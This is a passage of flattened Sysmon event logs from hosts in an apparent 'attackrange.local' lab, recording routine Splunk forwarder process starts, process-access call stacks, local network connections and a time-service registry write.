tdll.dll+51781 10341000x8000000000000000291047Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291046Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291045Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291044Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291043Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291042Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291041Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-01C5-6088-EC29-00000000BB01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291040Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-01C5-6088-EC29-00000000BB01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291039Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.777{BEA10069-01C5-6088-EC29-00000000BB01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000291038Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.091{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-01C5-6088-EB29-00000000BB01}1152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291037Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.091{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291036Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.091{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291035Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.091{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291034Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.091{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291033Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.091{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291032Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.091{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291031Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.091{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291030Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.091{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291029Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.091{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291028Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.091{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-01C5-6088-EB29-00000000BB01}1152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291027Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.091{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-01C5-6088-EB29-00000000BB01}1152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291026Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:25.092{BEA10069-01C5-6088-EB29-00000000BB01}1152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000439574Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:25.038{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439573Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:25.038{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000439583Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:23.627{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62367-false10.0.1.12-8000- 354300x8000000000000000439582Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:23.223{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local62366-true0:0:0:0:0:0:0:1win-dc-932.attackrange.local389ldap 354300x8000000000000000439581Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:23.223{42DC5269-CEA9-6086-2300-00000000BA01}2704C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local62366-true0:0:0:0:0:0:0:1win-dc-932.attackrange.local389ldap 13241300x8000000000000000439580Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:21:26.166{42DC5269-CE99-6086-1100-00000000BA01}340C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d73b5f-0xd7f2e269) 23542300x8000000000000000439579Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:26.073{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0143F4E5B16A603D2A5581BADC3ADD3F,SHA256=8B92111DA440460BEB45740586EB1F309C9A262C3ACEE52BDBC6CE481A1F1E6E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291067Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:24.406{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50588-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000291066Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:26.462{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-01C6-6088-ED29-00000000BB01}1276C:\Program 